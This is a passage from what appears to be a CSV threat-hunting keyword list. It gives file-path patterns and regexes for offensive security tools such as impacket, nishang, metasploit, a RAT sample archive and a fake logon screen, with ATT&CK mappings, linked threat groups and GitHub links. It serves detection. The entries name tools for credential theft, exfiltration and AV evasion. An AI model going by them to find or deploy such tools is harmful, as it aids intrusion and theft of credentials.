Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","N/A","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","15364" 
"*\ew_for_win_32.exe*",".{0,1000}\\ew_for_win_32\.exe.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","N/A","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","15365" "*\exchanger.py*",".{0,1000}\\exchanger\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15366" "*\exe_to_dll\*",".{0,1000}\\exe_to_dll\\.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","0","N/A","N/A","5","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","15367" "*\exec_diskshadow.py*",".{0,1000}\\exec_diskshadow\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - 
T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","15368" "*\exec_ftp.py*",".{0,1000}\\exec_ftp\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","15369" "*\exec_pcalua.py*",".{0,1000}\\exec_pcalua\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","15370" "*\exec_shdocvw.py*",".{0,1000}\\exec_shdocvw\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","15371" "*\execute_excel4macro.py*",".{0,1000}\\execute_excel4macro\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15372" "*\execute_excel4macro.txt*",".{0,1000}\\execute_excel4macro\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15373" "*\execute_registerxll.py*",".{0,1000}\\execute_registerxll\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15374" "*\execute_registerxll.txt*",".{0,1000}\\execute_registerxll\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15375" "*\execute_shellcode.exe*",".{0,1000}\\execute_shellcode\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - 
TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","15376" "*\ExecuteCommand_x64_Release.exe*",".{0,1000}\\ExecuteCommand_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","15377" "*\Execute-DNSTXT-Code.ps1*",".{0,1000}\\Execute\-DNSTXT\-Code\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","15378" "*\Exegol-*.zip*",".{0,1000}\\Exegol\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","15379" "*\exegol.py*",".{0,1000}\\exegol\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","15380" "*\Exegol-images-*.zip*",".{0,1000}\\Exegol\-images\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","15381" "*\Exegol-images-*\*docker*",".{0,1000}\\Exegol\-images\-.{0,1000}\\.{0,1000}docker.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","15382" "*\exetotext.ps1*",".{0,1000}\\exetotext\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","15383" "*\exfilGui.ps1*",".{0,1000}\\exfilGui\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","15384" "*\exfiltrate.exe*",".{0,1000}\\exfiltrate\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","0","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","15385" "*\exocet.elf*",".{0,1000}\\exocet\.elf.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","15386" "*\exocet.exe*",".{0,1000}\\exocet\.exe.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - 
TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","15387" "*\ExpandArchiveCommand.cs",".{0,1000}\\ExpandArchiveCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15388" "*\exploit.c",".{0,1000}\\exploit\.c","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","0","N/A","N/A","10","2","161","38","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z","15389" "*\exploit.dll*",".{0,1000}\\exploit\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","15390" 
"*\exploit.exe*",".{0,1000}\\exploit\.exe.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","15391" "*\exploit.exe*",".{0,1000}\\exploit\.exe.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","0","N/A","N/A","10","2","161","38","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z","15392" "*\exploit_suggester.py*",".{0,1000}\\exploit_suggester\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","15393" "*\ExploitableSystem.txt*",".{0,1000}\\ExploitableSystem\.txt.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege 
Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","15394" "*\ExploitElevate.cpp*",".{0,1000}\\ExploitElevate\.cpp.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","15395" "*\ExploitGuardProtectionHistory.csv*",".{0,1000}\\ExploitGuardProtectionHistory\.csv.{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","N/A","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","15396" "*\ExportCsvCommand.cs",".{0,1000}\\ExportCsvCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15397" "*\exported_credentials.csv*",".{0,1000}\\exported_credentials\.csv.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","N/A","10","6","510","59","2024-07-31T19:05:30Z","2022-09-09T15:07:15Z","15398" "*\ext_hijacker.h*",".{0,1000}\\ext_hijacker\.h.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","N/A","7","3","221","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z","15399" "*\ExtensionSpoof.exe*",".{0,1000}\\ExtensionSpoof\.exe.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","N/A","9","2","179","65","2024-12-12T18:05:28Z","2017-11-11T16:02:17Z","15400" "*\ExtensionSpoof.sln*",".{0,1000}\\ExtensionSpoof\.sln.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - 
TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","N/A","9","2","179","65","2024-12-12T18:05:28Z","2017-11-11T16:02:17Z","15401" "*\ExtensionSpoofer\*",".{0,1000}\\ExtensionSpoofer\\.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","N/A","9","2","179","65","2024-12-12T18:05:28Z","2017-11-11T16:02:17Z","15402" "*\ExternalC2\*",".{0,1000}\\ExternalC2\\.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","15403" "*\ExtPassword.chm*",".{0,1000}\\ExtPassword\.chm.{0,1000}","offensive_tool_keyword","ExtPassword.exe","Nirsoft tool for Windows that allows you to recover passwords stored on external drive plugged to your computer","T1081 - T1003 - T1212","TA0006 - TA0009","N/A","LockBit","Credential Access","https://www.nirsoft.net/utils/external_drive_password_recovery.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15404" "*\ExtPassword.html*",".{0,1000}\\ExtPassword\.html.{0,1000}","offensive_tool_keyword","ExtPassword.exe","Nirsoft tool for Windows that allows you to recover passwords stored on external drive plugged to your computer","T1081 - T1003 - T1212","TA0006 - TA0009","N/A","LockBit","Credential Access","https://www.nirsoft.net/utils/external_drive_password_recovery.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15405" 
"*\extpassword.zip*",".{0,1000}\\extpassword\.zip.{0,1000}","offensive_tool_keyword","ExtPassword.exe","Nirsoft tool for Windows that allows you to recover passwords stored on external drive plugged to your computer","T1081 - T1003 - T1212","TA0006 - TA0009","N/A","LockBit","Credential Access","https://www.nirsoft.net/utils/external_drive_password_recovery.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15406" "*\ExtPassword_lng.ini*",".{0,1000}\\ExtPassword_lng\.ini.{0,1000}","offensive_tool_keyword","ExtPassword.exe","Nirsoft tool for Windows that allows you to recover passwords stored on external drive plugged to your computer","T1081 - T1003 - T1212","TA0006 - TA0009","N/A","LockBit","Credential Access","https://www.nirsoft.net/utils/external_drive_password_recovery.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15407" "*\extract_wifi.exe*",".{0,1000}\\extract_wifi\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","15408" "*\Exymna RAT.exe*",".{0,1000}\\Exymna\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15409" "*\Fake Error Message RAT.exe*",".{0,1000}\\Fake\sError\sMessage\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - 
T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15410" "*\Fake Programs\reshacker.exe*",".{0,1000}\\Fake\sPrograms\\reshacker\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15411" "*\Fake Programs\team-2.exe*",".{0,1000}\\Fake\sPrograms\\team\-2\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15412" "*\FakeCmdLine*",".{0,1000}\\FakeCmdLine.{0,1000}","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. 
Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","0","N/A","N/A","N/A","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","15413" "*\FakeLogonScreen.exe*",".{0,1000}\\FakeLogonScreen\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15414" "*\FakeLogonScreen.exe*",".{0,1000}fakelogonscreen\.exe.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","15415" "*\FakeLogonScreen.pdb*",".{0,1000}\\FakeLogonScreen\.pdb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15416" "*\FakeLogonScreen.sln*",".{0,1000}\\FakeLogonScreen\.sln.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","15417" "*\fakelogonscreen-master*",".{0,1000}\\fakelogonscreen\-master.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","15418" "*\fakewarning.dll*",".{0,1000}\\fakewarning\.dll.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15419" "*\FastPathMITM.py*",".{0,1000}\\FastPathMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","15420" 
